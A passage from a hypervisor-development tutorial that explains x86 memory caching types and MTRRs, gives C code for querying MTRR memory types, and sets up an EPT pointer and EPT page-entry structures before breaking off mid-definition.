For now, this is all that's necessary to keep in the back of your mind. This next part is going to be pretty excerpt-heavy with descriptions and reasoning for collecting the information. Let's get on to MTRRs, and then we'll finally be ready to set up our EPT context.

— MTRRs

Memory type range registers (MTRRs) were briefly discussed in the first article of this series. In the simplest sense, these registers are used to associate memory caching types with physical-address ranges in system memory. They're (usually) initialized by the BIOS and are intended to optimize accesses for a variety of memory: RAM, ROM, frame buffers, MMIO, SMRAM, etc. These memory type ranges are exposed through a series of model-specific registers which define the type of memory for a given range of physical memory. There are a handful of memory types, and if you're familiar with the general theory of caching you'll recall that there are 3 different levels of caches the processor may use for memory operations. The memory type specified for a region of system memory influences whether those locations are cached, and their memory ordering model. In this subsection, whenever you see memory type or cache type, they refer to the same thing. We're going to address those memory types below.

PAT preference over MTRR

This section is a moderate overview of how the BIOS/UEFI firmware sets up MTRRs during boot; it's optional unless you're interested in how the firmware determines memory types and updates the various MTRRs. It's recommended that system developers use the Page Attribute Table (PAT) over the MTRRs. Feel free to skip ahead to the EPT hierarchies section.

𝛿 Strong Uncacheable (UC)

Any system memory marked as UC indicates that it isn't cached. Every load and store to that region is passed through the memory access path and executed in order, without any reordering. This means there are no speculative memory accesses, page-table walks, or any sort of branch prediction into the region. The memory controller performs the operation on DRAM at the default size (64 bytes is the typical minimum read size), but returns only the requested data to the processor, and the information is not propagated to any cache. Since having to access main memory (DRAM) is slow, using this memory type frivolously can significantly reduce the performance of the system. It's typically used for MMIO device ranges and the BIOS region. The memory model for this memory type is referred to as strongly ordered.

𝛿 Uncacheable (UC- or UC Minus)

This memory type has the same properties as the UC type although it can be overridden by WC if the MTRRs are updated. It’s also only able to be selected through the use of the page attribute table (PAT), which we will discuss following this section.

𝛿 Write Combine (WC)

This memory type is primarily used with any sort of GPU memory, frame buffer, etc., because the order of writes isn't important to the display of the data. It operates similarly to UC in that the memory locations aren't cached and coherency isn't enforced. For instance, if you use some GPU API to map a buffer or texture into memory, you can bet that memory will be marked as write combine (WC). An interesting behavior is what happens when a read is performed: the read operation is treated as if it were performed on an uncached location. All write-combining buffers get flushed to main memory (oof) and then the read is completed without any cache references. This means that reads on WC memory will impact performance if done often, much like with UC (because they behave as if the memory were UC).

There’s not really a great reason to read from WC memory, and reading back-buffers, or some constant buffer is usually advised against for this reason. If you want to perform a write to WC memory, well, you need to make sure your compiler doesn’t try to reorder writes (hint: volatile). You also don’t want to be performing writes to individual memory locations with WC memory – if you’re writing to a WC range, you’re going to want to write the whole range. It’s better to have one large write than a bunch of small writes — less of a performance impact when modifying WC memory. Alignment, access width, and other rules may be in place – so whether Intel or AMD, check your manual.

(For those reading that like to make game hacks and have issues with the perf of your “hardware ESP”, maybe this will jog your brain.)
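
To make the write advice concrete, here is a hypothetical sketch of filling a WC-mapped buffer; frame_buffer_va, pixels, and count stand in for whatever your mapping and source data actually are.

// Hypothetical sketch: fill a WC-mapped buffer in one sequential pass.
// The volatile qualifier keeps the compiler from reordering or eliding
// the stores; frame_buffer_va, pixels, and count are assumed inputs.
volatile u32* wc_buf = ( volatile u32* )frame_buffer_va;

for( u32 i = 0; i < count; i++ )
    wc_buf[ i ] = pixels[ i ];

// One large sequential write lets the write-combining buffers drain in
// full bursts instead of many partial flushes.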

𝛿 Write Through (WT)

With this cache type memory operations are cached. Reads will come from caches on a cache hit, misses will cause cache fills. You can see an explanation of read + fill in the previous article. The biggest thing to note about the write through (WT) type is that writes are propagated to a cache line and also written through to memory. This type enforces coherency between caches and main memory.

𝛿 Write Back (WB)

This is the most common memory type throughout the ranges on your machine, as it is the most performant. Memory operations are cached, speculative operations are allowed, however, writes to a cache line are not forwarded to system memory; they’re propagated to the cache and the modified cache lines are written back to main memory when a write-back operation occurs. It enforces memory and cache coherency, and requires devices that may access memory on the system bus to be able to snoop memory accesses. This allows low latency and high throughput for write-intensive tasks.

  Bus Snooping

The term bus snooping used to mean a device was sniffing the bus (monitoring bus transactions) to be aware of changes that may have occurred when requesting a cache line. In modern systems, it’s a bit different. If you’re interested in how cache coherency is maintained on modern systems you can look at the recommended reading section, and/or the patents under the cache coherency classification here. Additionally, the Intel Patent linked here.

𝛿 Write Protected (WP)

This caching type simply propagates writes to the interconnect (shared bus) and causes the relevant cache lines on all processors to be invalidated, whereas reads fetch data from cache lines when available. This memory type is usually intended to cache ROM without having to reach out to the ROM itself.

Now that we’ve discussed the different memory types available to the system programmer, let’s implement our MTRR API so we can appropriately set our memory types when we begin allocating memory for EPT.

— MTRR Implementation

With MTRRs, whether programming them or querying them for information, we're going to use a number of model-specific registers (MSRs) that Intel documents. The main two of interest are IA32_MTRR_CAP_MSR and IA32_MTRR_DEF_TYPE_MSR. The MTRR capabilities MSR (IA32_MTRR_CAP_MSR) is used to gather information such as the number of variable-range MTRRs implemented by the hardware, whether fixed-range MTRRs are supported, and whether write-combining is supported. There are some other flags, but they aren't of interest to us for this article. The structure for this MSR is given below.

typedef union _ia32_mtrrcap_msr
{
    u64 value;
    struct
    {
        u64 vcnt : 8;
        u64 fr_mtrr : 1;
        u64 rsvd0 : 1;
        u64 wc : 1;
        u64 smrr : 1;
        u64 prmrr : 1;
        u64 rsvd1 : 51;
    } bits;
} ia32_mtrrcap_msr;

The MTRR default type MSR (IA32_MTRR_DEF_TYPE_MSR) provides the default cache properties of physical memory that is not covered by the MTRRs. It also allows the software programming the MTRRs to determine whether MTRRs and the associated fixed ranges are enabled. Here is the structure I use.

typedef union _ia32_mtrr_def_type_msr
{
    u64 value;
    struct
    {
        u64 type : 8;
        u64 rsvd0 : 2;
        u64 fe : 1;
        u64 en : 1;
        u64 rsvd1 : 52;
    } bits;
} ia32_mtrr_def_type_msr;

MTRRs come in two flavors: fixed and variable range. On Intel, there are 11 fixed-range registers, each divided into eight 8-bit fields used to specify the memory type for each sub-range the register covers. The table below depicts how each fixed-range MTRR is divided to cover its respective address ranges.

Figure 4. Bit-field layout for fixed-range MTRRs

Knowing the mapping for each of these type range registers allows us to develop an algorithm to determine which fixed range an address falls under, if any. We'll achieve this by defining a few base points to compare the address against. As you can see, the first MTRR is named IA32_MTRR_FIX64K_00000; based on the address ranges covered by its bit-field it maps 512 KiB from 00000h to 7FFFFh through eight 64-KiB sub-ranges (see the table above). The IA32_MTRR_FIX16K_80000 and IA32_MTRR_FIX16K_A0000 MTRRs map two 128 KiB address ranges from 80000h to BFFFFh, each divided into eight 16-KiB sub-ranges. Finally, the eight FIX4K MTRRs each cover 32 KiB through eight 4-KiB sub-ranges, together covering the 256 KiB from C0000h to FFFFFh.

 MTRR Ranges

I’ve been unable to determine the exact reasoning for the layout of MTRRs, but my best guess would be because of the physical memory map after the BIOS transfers control. For instance, the first 384 KiB is typically reserved for ROM shadowing, real mode IVT, BIOS data, bootloader, etc. Then you have the 64 KiB range A0000h to AFFFFh which typically houses the graphics video memory; and the 32 KiB range C0000h to C7FFFh normally containing the VGA BIOS ROM / Video ROM, though the sub-ranges may require different memory types. It also stands to reason that the first two MTRRs cover the 640 KiB that was referred to as conventional memory back in early PCs.

With this in mind let’s define a few things like the MTRR MSRs, cache type encodings, and the start addresses for each range covered, which a given address will be compared against to determine if it falls within.

#define CACHE_MEMORY_TYPE_UC                 0x0000
#define CACHE_MEMORY_TYPE_WC                 0x0001
#define CACHE_MEMORY_TYPE_WT                 0x0004
#define CACHE_MEMORY_TYPE_WP                 0x0005
#define CACHE_MEMORY_TYPE_WB                 0x0006
#define CACHE_MEMORY_TYPE_UC_MINUS           0x0007
#define CACHE_MEMORY_TYPE_ERROR              0x00FE     /* user-defined */
#define CACHE_MEMORY_TYPE_RESERVED           0x00FF

#define IA32_MTRR_CAP_MSR                    0x00FE
#define IA32_MTRR_DEF_TYPE_MSR               0x02FF

#define IA32_MTRR_FIX64K_00000_MSR           0x0250
#define IA32_MTRR_FIX16K_80000_MSR           0x0258
#define IA32_MTRR_FIX16K_A0000_MSR           0x0259
#define IA32_MTRR_FIX4K_C0000_MSR            0x0268
#define IA32_MTRR_FIX4K_C8000_MSR            0x0269
#define IA32_MTRR_FIX4K_D0000_MSR            0x026A
#define IA32_MTRR_FIX4K_D8000_MSR            0x026B
#define IA32_MTRR_FIX4K_E0000_MSR            0x026C
#define IA32_MTRR_FIX4K_E8000_MSR            0x026D
#define IA32_MTRR_FIX4K_F0000_MSR            0x026E
#define IA32_MTRR_FIX4K_F8000_MSR            0x026F

#define MTRR_FIX64K_BASE                     0x00000
#define MTRR_FIX16K_BASE                     0x80000
#define MTRR_FIX4K_BASE                      0xC0000
#define MTRR_FIXED_MAXIMUM                   0xFFFFF

#define MTRR_FIXED_RANGE_ENTRIES_MAX         88
#define MTRR_VARIABLE_RANGE_ENTRIES_MAX      255

Now, let’s derive a function to get the memory type of an address that falls within a fixed-range.

static u8 mtrr_index_fixed_range( u32 msr_address, u32 idx )
{
    // Read the MTRR that holds this index (8 fields per MSR) and extract
    // the memory type value from the bitfield.
    //
    u64 val = __readmsr( msr_address + ( idx >> 3 ) );
    return ( u8 )( val >> ( ( idx & 7 ) << 3 ) );
}

static u8 mtrr_get_fixed_range_type( u64 address, u64* size )
{
    ia32_mtrrcap_msr mtrrcap = { 0 };
    ia32_mtrr_def_type_msr mtrrdef = { 0 };
    
    mtrrcap.value = __readmsr( IA32_MTRR_CAP_MSR );
    mtrrdef.value = __readmsr( IA32_MTRR_DEF_TYPE_MSR );
    
    // Check that MTRRs (and fixed-range MTRRs) are supported and enabled,
    // and that the address is within the ranges covered by fixed-range MTRRs.
    //
    if( !mtrrcap.bits.fr_mtrr || !mtrrdef.bits.en ||
        !mtrrdef.bits.fe || address > MTRR_FIXED_MAXIMUM )
        return CACHE_MEMORY_TYPE_RESERVED;
    
    // Check if address is within the FIX64K range.
    //
    if( address < MTRR_FIX16K_BASE ) 
    {
        *size = PAGE_SIZE << 4; /* 64KB */
        return mtrr_index_fixed_range( IA32_MTRR_FIX64K_00000_MSR, address / ( PAGE_SIZE << 4 ) );
    }
    
    // Check if address is within the FIX16K range.
    //
    if( address < MTRR_FIX4K_BASE ) 
    {
        address -= MTRR_FIX16K_BASE;
        *size = PAGE_SIZE << 2; /* 16 KB */
        return mtrr_index_fixed_range( IA32_MTRR_FIX16K_80000_MSR, address / ( PAGE_SIZE << 2 ) );
    }
    
    // If we're not in any of those ranges, we're in the FIX4K range.
    //
    address -= MTRR_FIX4K_BASE;
    *size = PAGE_SIZE;
    
    return mtrr_index_fixed_range( IA32_MTRR_FIX4K_C0000_MSR, address / PAGE_SIZE );
}

The function above uses the relevant MSRs and MTRRs to determine whether a given address falls within a fixed range. mtrr_get_fixed_range_type captures the current values of the MTRR capability MSR and the MTRR default memory type MSR, then uses the bitfields from the structures defined earlier to verify that fixed-range MTRRs are enabled and that the address falls within the maximum fixed range supported. It then compares the address provided to the different start addresses of the ranges (MTRR_FIX16K_BASE, which starts at 80000h, for instance). The first expression checks whether the address falls within the 64K fixed range by checking if it's less than 80000h, then sets the size of the range to 64K (or whatever the relevant size for the range is). Remember that the 64K range comprises eight 64-KiB sub-ranges. The helper function above takes the base MSR address and an expression that yields the index of the memory type within the MSR bitfield. Let's briefly walk through that line and the helper function, as the same reasoning applies to the other ranges as well.

Given the address 81A00h passed through this function, we’ll wind up branching into this conditional block:

// Check if address is within the FIX16K range.
//
if( address < MTRR_FIX4K_BASE ) 
{
    address -= MTRR_FIX16K_BASE;
    *size = PAGE_SIZE << 2;
    return mtrr_index_fixed_range( IA32_MTRR_FIX16K_80000_MSR, address / ( PAGE_SIZE << 2 ) );
}

This is because the address 81A00h is less than the start address of the fixed 4K range, but not lower than the fixed 16K range start. Inside this conditional block the base of the fixed range (MTRR_FIX16K_BASE) is subtracted from the address to determine the offset into the range. The size of the range is then set to PAGE_SIZE << 2, which is just PAGE_SIZE (1000h) * 4, yielding 16 KiB. We then use the fixed-range MSR for the first 16K MTRR, and the address divided by the size of the range, which gives us the index into the bitfield of the MSR after it is read. This index also determines which MSR in the group should be read. The shifts will be explained as we go through the helper function.

static u8 mtrr_index_fixed_range( u32 msr_address, u32 idx )
{
    // Read the MTRR that holds this index (8 fields per MSR) and extract
    // the memory type value from the bitfield.
    //
    u64 val = __readmsr( msr_address + ( idx >> 3 ) );
    return ( u8 )( val >> ( ( idx & 7 ) << 3 ) );
}

The helper function above reads from the MSR address given, in this case IA32_MTRR_FIX16K_80000_MSR, after adding the index divided by 8 (so indices 8 and above select the next MSR in the group). Here, the index derives from the expression in the conditional block, address / ( PAGE_SIZE << 2 ), which expands to 1A00h / 4000h → 0. It then indexes into that MSR's bitfield (refer to the earlier diagram) using the value 0. This makes sense, as the address 81A00h falls within the first bitfield (0th index) of the IA32_MTRR_FIX16K_80000 MTRR, which covers physical addresses 80000h to 83FFFh. It then takes the MSR value, which reads as 06060606`06060606h here, and shifts it right by (index modulo 8) multiplied by 8, which is 0, meaning it uses the value 6h from the first byte. The memory type that corresponds to the value 6h is CACHE_MEMORY_TYPE_WB per our earlier definitions. If this is confusing to follow, I've provided a diagram below using the same address, as well as an address that would fall within a fixed 4K range.

Figure 5. Calculating memory type for physical address using MTRRs.
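
To tie the walkthrough together, here's a quick hypothetical usage of the lookup; the expected results assume a typical system where the legacy VGA window is uncacheable.

// Hypothetical usage: query the memory type of the legacy VGA window.
//
u64 range_size = 0;
u8 mem_type = mtrr_get_fixed_range_type( 0xA0000, &range_size );

// On a typical system, mem_type == CACHE_MEMORY_TYPE_UC and
// range_size == 0x4000 (16 KiB, one FIX16K sub-range).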

The above is pretty straightforward, as the fixed ranges have easily indexable MSRs. Hopefully the example cleared up any potential confusion about how the memory type is calculated for these ranges. Now that we've gone over fixed-range MTRRs we need to construct an algorithm for determining the memory type of a variable range MTRR. And yes, there's more to them… Each variable range MTRR allows software to specify a memory type for a varying number of address ranges. This is done through a pair of MSRs for each range. How do we determine the number of variable ranges our platform supports? Recall the IA32_MTRRCAP_MSR structure.

typedef union _ia32_mtrrcap_msr
{
    u64 value;
    struct
    {
        u64 vcnt : 8;
        u64 fr_mtrr : 1;
        u64 rsvd0 : 1;
        u64 wc : 1;
        u64 smrr : 1;
        u64 prmrr : 1;
        u64 rsvd1 : 51;
    } bits;
} ia32_mtrrcap_msr;

The first 8 bits of the bitfield are allocated to the vcnt member, which indicates the number of variable ranges implemented on the processor. We'll need to remember this for use in our function. It was mentioned that MSR pairs are provided for programming the memory type of these variable range MTRRs; these are referred to as IA32_MTRR_PHYSBASEn and IA32_MTRR_PHYSMASKn, where "n" represents a value in the range 0 through (vcnt - 1). The MSR addresses for these pairs are provided below.

#define IA32_MTRR_PHYSBASE0_MSR              0x0200
#define IA32_MTRR_PHYSMASK0_MSR              0x0201

#define IA32_MTRR_PHYSBASE1_MSR              0x0202
#define IA32_MTRR_PHYSMASK1_MSR              0x0203 
     
#define IA32_MTRR_PHYSBASE2_MSR              0x0204
#define IA32_MTRR_PHYSMASK2_MSR              0x0205
   
#define IA32_MTRR_PHYSBASE3_MSR              0x0206
#define IA32_MTRR_PHYSMASK3_MSR              0x0207 
          
#define IA32_MTRR_PHYSBASE4_MSR              0x0208
#define IA32_MTRR_PHYSMASK4_MSR              0x0209 
         
#define IA32_MTRR_PHYSBASE5_MSR              0x020a
#define IA32_MTRR_PHYSMASK5_MSR              0x020b
           
#define IA32_MTRR_PHYSBASE6_MSR              0x020c
#define IA32_MTRR_PHYSMASK6_MSR              0x020d  
        
#define IA32_MTRR_PHYSBASE7_MSR              0x020e
#define IA32_MTRR_PHYSMASK7_MSR              0x020f 
          
#define IA32_MTRR_PHYSBASE8_MSR              0x0210
#define IA32_MTRR_PHYSMASK8_MSR              0x0211
         
#define IA32_MTRR_PHYSBASE9_MSR              0x0212
#define IA32_MTRR_PHYSMASK9_MSR              0x0213

Each of these MSRs has a specific layout; both are defined below.

typedef union _ia32_mtrr_physbase_msr
{
    u64 value;
    struct
    {
        u64 type : 8;
        u64 rsvd0 : 4;
        u64 physbase_lo : 39;
        u64 rsvd1 : 13;
    } bits;
} ia32_mtrr_physbase_msr;

typedef union _ia32_mtrr_physmask_msr
{
    u64 value;
    struct
    {
        u64 rsvd0 : 11;
        u64 valid : 1;
        u64 physmask_lo : 39;
        u64 rsvd1 : 13;
    } bits;
} ia32_mtrr_physmask_msr;

  Overlapping Ranges

It’s possible for variable range MTRRs to overlap an address range that is described by another variable range MTRR. It’s important that the reader look over §11.11.4.1 MTRR Precedences (Intel SDM Vol. 3A) and ensure these rules are followed when attempting to determine the memory type of an address within a variable range MTRR. The proper handling of the precedence rules is pointed out in the function implementation below; however, ensure you understand why.
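
Since the full variable-range walk was cut for length, here is a minimal sketch of one under the precedence rules above. The hw_query_mtrr_memtype helper, which the EPT mapping code later in this article calls, is then one possible composition of the fixed lookup, the variable lookup, and the default type; treat both as sketches rather than a definitive implementation.

static u8 mtrr_get_variable_range_type( u64 address )
{
    ia32_mtrrcap_msr mtrrcap;
    ia32_mtrr_physbase_msr physbase;
    ia32_mtrr_physmask_msr physmask;
    u8 type = CACHE_MEMORY_TYPE_RESERVED;
    u32 idx;
    
    mtrrcap.value = __readmsr( IA32_MTRR_CAP_MSR );
    
    for( idx = 0; idx < mtrrcap.bits.vcnt; idx++ )
    {
        physbase.value = __readmsr( IA32_MTRR_PHYSBASE0_MSR + ( idx * 2 ) );
        physmask.value = __readmsr( IA32_MTRR_PHYSMASK0_MSR + ( idx * 2 ) );
        
        // Skip ranges that aren't marked valid.
        //
        if( !physmask.bits.valid )
            continue;
        
        // The range matches when (address & mask) == (base & mask),
        // comparing bits 12 and up.
        //
        if( ( ( address >> 12 ) & physmask.bits.physmask_lo ) !=
            ( physbase.bits.physbase_lo & physmask.bits.physmask_lo ) )
            continue;
        
        if( type == CACHE_MEMORY_TYPE_RESERVED )
        {
            // First matching range.
            //
            type = ( u8 )physbase.bits.type;
        }
        else if( type == CACHE_MEMORY_TYPE_UC ||
                 physbase.bits.type == CACHE_MEMORY_TYPE_UC )
        {
            // UC takes precedence over any other type.
            //
            type = CACHE_MEMORY_TYPE_UC;
        }
        else if( ( type == CACHE_MEMORY_TYPE_WT && physbase.bits.type == CACHE_MEMORY_TYPE_WB ) ||
                 ( type == CACHE_MEMORY_TYPE_WB && physbase.bits.type == CACHE_MEMORY_TYPE_WT ) )
        {
            // WT wins when WT and WB overlap.
            //
            type = CACHE_MEMORY_TYPE_WT;
        }
        else if( type != ( u8 )physbase.bits.type )
        {
            // Any other overlap is undefined behavior; flag it.
            //
            return CACHE_MEMORY_TYPE_ERROR;
        }
    }
    
    return type;
}

u8 hw_query_mtrr_memtype( u64 pa )
{
    u64 size = 0;
    u8 type = mtrr_get_fixed_range_type( pa, &size );
    
    if( type != CACHE_MEMORY_TYPE_RESERVED )
        return type;
    
    type = mtrr_get_variable_range_type( pa );
    
    // Fall back to the default type when no range covers the address.
    //
    if( type == CACHE_MEMORY_TYPE_RESERVED )
    {
        ia32_mtrr_def_type_msr mtrrdef;
        mtrrdef.value = __readmsr( IA32_MTRR_DEF_TYPE_MSR );
        type = ( u8 )mtrrdef.bits.type;
    }
    
    return type;
}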

If you’re interested in how the variable-range MTRRs and PAT are initialized by the hardware/BIOS/firmware, I highly recommend the section of the manual referenced in the note above, or see the recommended reading for more on setting up memory types during the early boot stages. This section was initially going to cover the entire initialization, but since that's out of scope for this series, and using the PAT is recommended anyway, I've cut the remainder to keep the article's length down. If there is interest in the process of setting them up, I could do a spin-off article about it. In any case, let's move on to the EPT hierarchies and get our structures updated to facilitate EPT initialization.

— EPT Page Hierarchies

Once the features have been determined to be available we’re going to want to initialize our EPT pointer. This article will only cover the initialization of a single page hierarchy. In a future article, we will cover the initialization of multiple EPT pointers to allow for a switching method that utilizes numerous page hierarchies, as opposed to the standard page-switching that occurs upon EPT violations you may have read about.

There are a number of ways to design a hypervisor: some may choose to only associate EPT data within the vCPU structure, while others may take a more decoupled approach and keep an EPT state structure for the host that tracks all guest EPT states through some form of global linked list with accessors. For the sake of simplicity, this article tracks the data structures by storing them in the vCPU data structure, to be initialized during the MP init phase of your hypervisor. The EPT data structure to be added to your vCPU structure is given below.

typedef struct _ept_state
{
    u64 eptp;
    p64 topmost_ps;
    u64 gaw;
} ept_state, *pept_state;

The members of this structure relevant to this article are presented; it can be extended in the future to support more than one EPTP and topmost paging structure. The gaw member is the guest address width value, which is important to know when performing a page walk over the EPT hierarchy. You'll need to allocate this data structure as you would any other in your stand-up functions prior to vmxon. If you're wondering why there are members for both the EPTP and the topmost paging structure, it's because the EPT pointer has a specific format that contains the topmost paging structure's address (in this case, the PML4) along with other configuration information like memory type, walk length, etc.
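
If your vCPU structure doesn't yet have a home for this, a hypothetical fragment might look like the following; the surrounding members are placeholders for whatever your layout already carries.

typedef struct _vcpu
{
    u32 index;               /* logical processor number (placeholder) */
    void* vmcs_region;       /* per-vCPU VMCS region (placeholder)     */
    pept_state ept_state;    /* EPT data initialized during MP init    */
} vcpu_t;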

pept_state vcpu_ept_data = mem_allocate( sizeof( ept_state ) );
zeromemory_s(vcpu_ept_data, sizeof( ept_state ) );

//
// Initialization of the single EPT page hierarchy.
//
// ...
//

At this point, we need to allocate our EPT page hierarchy. This will require standing up our own PML4 table and initializing our EPTP properly. Allocation of our PML4 table is done just like it would be for any other page:

typedef union _physical_address
{
    struct
    {
        u32 low;
        i32 high;
    };
    struct
    {
        u32 low;
        i32 high;
    } upper;
    
    i64 quad;
} physical_address;

static p64 eptm_allocate_entry( physical_address* pa )
{
    p64 pxe = mem_allocate( PAGE_SIZE );
    
    if( !pxe )
        return NULL;
    
    zeromemory_s( pxe, PAGE_SIZE );
    
    // Translate allocated entry virtual address to physical.
    //
    *pa = mem_vtop( pxe );
    
    // Return virtual address of our new entry.
    //
    return pxe;
}

  Custom Address Translation

The mem_vtop function uses a custom address translation/page walker, however, it may be better suited for your first run through to use MmGetPhysicalAddress on the returned virtual address. Implementing your own address translation and page walker isn’t necessary for this basic setup utilizing EPT, but I will include it toward the end of the article as extra reading material.
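
For reference, a minimal stand-in for mem_vtop under that suggestion, assuming a Windows kernel driver context:

#include <ntddk.h>

// Thin wrapper over MmGetPhysicalAddress; swap in your own page walker
// later if you implement one.
static physical_address mem_vtop( void* va )
{
    physical_address pa;
    pa.quad = MmGetPhysicalAddress( va ).QuadPart;
    return pa;
}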

Your ept_initialize function should look something like this at this point.

// Allocate and initialize prior to vmxon and after feature availability check.
//
pept_state vcpu_ept_data = mem_allocate( sizeof( ept_state ) ); 
zeromemory_s( vcpu_ept_data, sizeof( ept_state ) ); 

// Initialization of the single EPT page hierarchy. 
//
vcpu_ept_data->gaw = PML4 - 1; /* 4-level page walk; the EPTP encodes (walk length - 1) = 3 */
ret = eptm_initialize_pt( vcpu_ept_data );

if( ret != 0 )
{
    eptm_release_resources( vcpu_ept_data );
    return ret;
}

vcpu->ept_state = vcpu_ept_data;

///////////////////////////////// eptm_initialize_pt definition below /////////////////////////////////

// Initialization of page tables associated with our EPTP.
//
vmm_status_t eptm_initialize_pt( pept_state ept_state )
{
    p64 ept_topmost;
    physical_address ept_topmost_pa;
    vmm_status_t ret;
    
    ret = 0;
    
    ept_topmost = eptm_allocate_entry( &ept_topmost_pa );
    if( !ept_topmost )
        return VMM_STATUS_MEM_ALLOC_FAILED;
    
    ept_state->topmost_ps = ept_topmost;
    
    // Initialize the EPT pointer and store it in our EPT state
    // structure.
    //
    // ...
    //
    
    //
    // Construct identity mapping for EPT page hierarchy w/ default
    // page size granularity (4kB).
    //
    // ...
    //
}

The next step is to construct our EPTP and store it in the ept_state structure for later insertion into the VMCS. We’ll first need the structure defined that represents the EPTP format.

typedef union _eptp_format
{
    u64 value;
    struct
    {
        u64 memory_type : 3;
        u64 guest_address_width : 3;
        u64 ad_flag_enable : 1;
        u64 ar_enforcement_ssp : 1;
        u64 rsvd0 : 4;
        u64 ept_pml4_pfn : 40;
        u64 rsvd1 : 12;
    } bits;
} eptp_format;
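
The EPT_MEMORY_TYPE_WB constant used below isn't defined elsewhere in this article; it's the same write-back encoding (6) as the cache type values defined earlier.

// EPTP memory type encoding for write-back (matches CACHE_MEMORY_TYPE_WB).
#define EPT_MEMORY_TYPE_WB    0x0006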

Once defined we’ll adjust the eptm_initialize_pt function and initialize our EPT pointer.

vmm_status_t eptm_initialize_pt( pept_state ept_state )
{
    p64 ept_topmost;
    physical_address ept_topmost_pa;
    eptp_format eptp;
    vmm_status_t ret;
    
    ret = 0;
    
    ept_topmost = eptm_allocate_entry( &ept_topmost_pa );
    if( !ept_topmost )
        return VMM_STATUS_MEM_ALLOC_FAILED;
    
    ept_state->topmost_ps = ept_topmost;
    
    // Initialize the EPT pointer and store it in our EPT state
    // structure.
    //
    eptp.value = ept_topmost_pa.quad;
    eptp.bits.memory_type = EPT_MEMORY_TYPE_WB;
    eptp.bits.guest_address_width = ept_state->gaw;
    eptp.bits.rsvd0 = 0;
    
    ept_state->eptp = eptp.value;
    
    //
    // Construct identity mapping for EPT page hierarchy w/ default
    // page size granularity (4kB).
    //
    // ...
    //
}

We’ve now successfully set up our topmost paging structure (the EPT PML4 table), and our EPT pointer is formatted for use. All that’s left is to construct the identity mapping permitting all page accesses for our EPT page hierarchy – however, this requires us to cover the differences between the normal paging structures and EPT paging structures.

— Paging Structure Differences

When utilizing EPT there are subtle changes in how things are structured, one of which is the page-table entry format. For every first-level page mapping entry (FL-PMEn), you'll see a layout similar to this:

struct
{
    u64 present : 1;
    u64 rw : 1;
    u64 us : 1;
    u64 pwt : 1;
    u64 pcd : 1;
    u64 accessed : 1;
    u64 dirty : 1;
    u64 ps_pat : 1;
    u64 global : 1;
    u64 avl0 : 3;
    u64 pfn : 40;
    u64 avl1 : 7;
    u64 pkey : 4;
    u64 xd : 1;
} pte, pme;

Each field here is used by the page walker to perform address translation and verify if an operation to this page is valid, or invalid. The fields are detailed in the Intel SDM Vol. 3-A Chapter 4 – this is just a definition used in my project as I don’t fancy having masks everywhere for individual bits (so I use bitfields). The pme simply means page mapping entry and is an internal term for my project since all paging structure entries follow a similar format. I use this structure for every table entry at all levels. The only difference is the reserved bits at each level which you’ll either come to memorize or document yourself. Now, let’s take a look at what the page table entry structure looks like for EPT.

For each second-level page mapping entry (SL-PMEn), we see this layout:

struct
{
    u64 rd : 1;
    u64 wr : 1;
    u64 x : 1;
    u64 mt : 3;
    u64 ipat : 1;
    u64 avl0 : 1;
    u64 accessed : 1;
    u64 dirty : 1;
    u64 ex_um : 1;
    u64 avl1 : 1;
    u64 pfn : 39;
    u64 rsvd : 9;
    u64 sssp : 1;
    u64 sub_page_wr : 1;
    u64 avl2 : 1;
    u64 suppressed_ve : 1;
} epte, slpme;

The differences may not be immediately obvious, but the first three bits in this SL-PME represent whether this page allows read, write, or execute (instruction fetches) from the region it controls. As opposed to the first structure which has a bit for determining if the page is present, allows read/write operations, and if user-mode accesses are allowed. The differences become clear when we place the two tables atop one another, as below.

 

Figure 6. Format of a FL-PTE (top) and SL-PTE (bottom).

 

With this information, it’s helpful to derive a data structure to represent the two formats as this will make translation much easier later on. The data structure you create may look something like this:

typedef union _page_entry_t
{
    struct
    {
        u64 present : 1;
        u64 rw : 1;
        u64 us : 1;
        u64 pwt : 1;
        u64 pcd : 1;
        u64 accessed : 1;
        u64 dirty : 1;
        u64 ps_pat : 1;
        u64 global : 1;
        u64 avl0 : 3;
        u64 pfn : 40;
        u64 avl1 : 7;
        u64 pkey : 4;
        u64 xd : 1;
    } pte, flpme;
    
    struct
    {
        u64 rd : 1;
        u64 wr : 1;
        u64 x : 1;
        u64 mt : 3;
        u64 ipat : 1;
        u64 avl0 : 1;
        u64 accessed : 1;
        u64 dirty : 1;
        u64 ex_um : 1;
        u64 avl1 : 1;
        u64 pfn : 39;
        u64 rsvd : 9;
        u64 sssp : 1;
        u64 sub_page_wr : 1;
        u64 avl2 : 1;
        u64 suppressed_ve : 1;
    } epte, slpme;
    
    struct
    {
        u64 rd : 1;
        u64 wr : 1;
        u64 x : 1;
        u64 mt : 3;
        u64 ps_ipat : 1;
        u64 avl0 : 1;
        u64 accessed : 1;
        u64 dirty : 1;
        u64 avl1 : 1;
        u64 snoop : 1;
        u64 pa : 39;
        u64 rsvd : 13;
    } vtdpte;
} page_entry_t;

Using a union here allows me to easily cast to one data structure and reference some internal bitfield layout for whatever specific entry type is needed. You will see this come into play as we initialize the remaining requirements for EPT in the next section.
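
A tiny hypothetical illustration of that casting in practice; raw_entry stands in for any raw 64-bit table entry you might be holding.

u64 raw_entry = 0;                               /* assumed raw table entry */
page_entry_t* pxe = ( page_entry_t* )&raw_entry;

if( pxe->flpme.present )  { /* interpret as a first-level entry  */ }
if( pxe->slpme.rd )       { /* interpret as a second-level entry */ }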

  Requirements for First-Level and Second-Level Page Tables

Despite the differences in their page-table entry formats, both require a top-level structure such as the PML4 or PML5, plus the respective sub-tables: PDPT, PDT, and PT; or PML4, PDPT, PDT, and PT (if PML5 is enabled).

— EPT Identity Mapping (4kB)

When it comes to paging there are a lot of interchanged terms, identity mapping is one of them. It’s sometimes referred to as identity paging or direct mapping. I find the latter more confusing than the former, so throughout the remainder of this article, any time identity mapping/paging is used they are referring to the same thing.

When a processor first enables paging it is required to be executing code from an identity-mapped page. This means the software maps each virtual address to the same physical address. Identity mapping is achieved by initializing page entries to point to their corresponding 4kB physical frames. It may be easier to understand through example, so here is the code for constructing the table and associated sub-tables for the guest with a 1:1 mapping to the host.

First, we’ll need a way to get all available physical memory pages accounted for. We’re going to reference a global pointer within ntoskrnl, MmPhysicalMemoryBlock, which contains a list of physical memory descriptors (_PHYSICAL_MEMORY_DESCRIPTOR). The number of elements in this data structure is determined via the NumberOfRuns member, and there is an array under the Run member of type _PHYSICAL_MEMORY_RUN. Both of these structures are defined in the WDK headers; however, I’ve redefined them to fit the format of the other code.

typedef struct _physical_memory_run
{
    u64 base_page;
